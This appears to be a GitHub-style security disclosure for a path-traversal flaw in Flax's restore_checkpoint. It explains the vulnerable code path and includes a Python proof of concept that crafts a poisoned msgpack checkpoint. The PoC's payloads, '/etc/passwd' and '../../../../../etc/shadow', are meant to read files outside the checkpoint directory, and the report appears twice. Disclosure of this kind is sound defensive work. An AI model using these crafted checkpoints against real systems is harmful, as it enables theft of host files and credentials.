Reporting here as confirmed with Google bug hunters:
“
We've reviewed it, and while we appreciate you flagging this, we need to let you know that we're no longer offering rewards for product vulnerabilities like this one in projects that fall into the OT2 or OT3 tiers. The Flax repository, https://github.com/google/flax, is currently categorized in this way for reward eligibility. You're still welcome to open an issue or submit a pull request directly on the GitHub repo if you'd like to help get this fixed!
“
Summary
restore_checkpoint treats any checkpoint leaf string beginning with the placeholder //GDAPlaceholder: as a multiprocess-array reference and joins the (attacker-controlled) suffix to the checkpoint directory with no confinement check. A crafted checkpoint can make flax open and read files outside the checkpoint directory (via tensorstore), through the documented multi-host restore path.
Details
flax/training/checkpoints.py, _restore_mpas (L333-334):
mpa_path = os.path.join(ckpt_path + MP_ARRAY_POSTFIX, value[len(MP_ARRAY_PH):])
value is a leaf taken from the msgpack checkpoint; the bytes after the MP_ARRAY_PH = '//GDAPlaceholder:' prefix (L71) are attacker-controlled. The result feeds get_tensorstore_spec(path) (L288) → gda_manager.deserialize(...) (L289), which opens and reads it. An absolute suffix (/etc/passwd) makes os.path.join discard the base; a ../ suffix escapes the …_gda dir. Root cause = save/restore asymmetry: on save the suffix is a benign relative pytree key (L183), on restore it is trusted unvalidated.
Reachability: the documented multi-host restore path — caller passes a gda_manager and a target containing a multiprocess (non-fully-addressable) jax.Array at the poisoned key (gating _check_mpa_errors). This is the normal state of arrays under jax.distributed/multi-host pjit.
PoC
poc_mpa_traversal.py crafts a msgpack checkpoint whose leaf is MP_ARRAY_PH + "/etc/passwd" and restores it with a recording array manager:
payload='/etc/passwd' -> READ PATH: /etc/passwd escaped_dir=True
payload='../../../../../etc/shadow' -> READ PATH: /etc/shadow escaped_dir=True
poc_mpa_traversal.py:
#!/usr/bin/env python3
"""
PoC: arbitrary file read / path traversal in flax.training.checkpoints.restore_checkpoint
(flax 0.12.7). Sink: flax/training/checkpoints.py:333-334 (_restore_mpas) — an attacker leaf
"//GDAPlaceholder:<suffix>" is os.path.join'd onto the ckpt dir with no confinement; an
absolute/`..` suffix escapes, and flax reads it via tensorstore.
Precondition (documented multi-host restore): target has a non-fully-addressable jax.Array at
the poisoned key. MPALeaf is a faithful stand-in (isinstance jax.Array True, is_fully_addressable
False) — exactly an array's state under jax.distributed/multi-host pjit. No flax code modified.
Requires: pip install flax jax jaxlib
"""
import os, tempfile, jax, jax.numpy as jnp
from flax import serialization
from flax.training import checkpoints
from flax.training.checkpoints import MP_ARRAY_PH, _is_multiprocess_array
class MPALeaf:
is_fully_addressable = False
def __init__(self, a): object.__setattr__(self, "_a", a)
def __getattr__(self, k): return getattr(object.__getattribute__(self, "_a"), k)
@property
def __class__(self): return type(jnp.arange(1)) # pass isinstance(.., jax.Array)
victim = MPALeaf(jnp.arange(4))
assert isinstance(victim, jax.Array) and _is_multiprocess_array(victim)
target = {"params": victim}
captured = {}
class RecordingGdaManager:
def wait_until_finished(self): pass
def deserialize(self, shardings, ts_specs, *a, **k):
captured["ts_specs"] = list(ts_specs); return [jnp.zeros(4) for _ in ts_specs]
def run(payload):
with tempfile.TemporaryDirectory() as d:
ckpt = os.path.join(d, "checkpoint_0")
open(ckpt, "wb").write(serialization.msgpack_serialize({"params": MP_ARRAY_PH + payload}))
checkpoints.restore_checkpoint(ckpt, target=target, gda_manager=RecordingGdaManager())
path = captured["ts_specs"][0]["kvstore"]["path"]
escaped = not os.path.abspath(path).startswith(os.path.abspath(d))
print(f"payload={payload!r:30} -> READ PATH {path} escaped_dir={escaped}")
return escaped
ok = run("/etc/passwd") and run("../../../../../../etc/shadow")
print("CONFIRMED: checkpoint leaf -> arbitrary out-of-dir read path" if ok else "not reproduced")
raise SystemExit(0 if ok else 1)
Impact
Loading an untrusted Flax checkpoint (a common ML supply-chain scenario) on the multi-host restore path reads arbitrary host files into the restore (confidentiality). No code-exec.
Reporting here as confirmed with Google bug hunters:
“
We've reviewed it, and while we appreciate you flagging this, we need to let you know that we're no longer offering rewards for product vulnerabilities like this one in projects that fall into the OT2 or OT3 tiers. The Flax repository, https://github.com/google/flax, is currently categorized in this way for reward eligibility. You're still welcome to open an issue or submit a pull request directly on the GitHub repo if you'd like to help get this fixed!
“
Summary
restore_checkpointtreats any checkpoint leaf string beginning with the placeholder//GDAPlaceholder:as a multiprocess-array reference and joins the (attacker-controlled) suffix to the checkpoint directory with no confinement check. A crafted checkpoint can make flax open and read files outside the checkpoint directory (via tensorstore), through the documented multi-host restore path.Details
flax/training/checkpoints.py,_restore_mpas(L333-334):valueis a leaf taken from the msgpack checkpoint; the bytes after theMP_ARRAY_PH = '//GDAPlaceholder:'prefix (L71) are attacker-controlled. The result feedsget_tensorstore_spec(path)(L288) →gda_manager.deserialize(...)(L289), which opens and reads it. An absolute suffix (/etc/passwd) makesos.path.joindiscard the base; a../suffix escapes the…_gdadir. Root cause = save/restore asymmetry: on save the suffix is a benign relative pytree key (L183), on restore it is trusted unvalidated.Reachability: the documented multi-host restore path — caller passes a
gda_managerand atargetcontaining a multiprocess (non-fully-addressable)jax.Arrayat the poisoned key (gating_check_mpa_errors). This is the normal state of arrays underjax.distributed/multi-host pjit.PoC
poc_mpa_traversal.pycrafts a msgpack checkpoint whose leaf isMP_ARRAY_PH + "/etc/passwd"and restores it with a recording array manager:poc_mpa_traversal.py:
Impact
Loading an untrusted Flax checkpoint (a common ML supply-chain scenario) on the multi-host restore path reads arbitrary host files into the restore (confidentiality). No code-exec.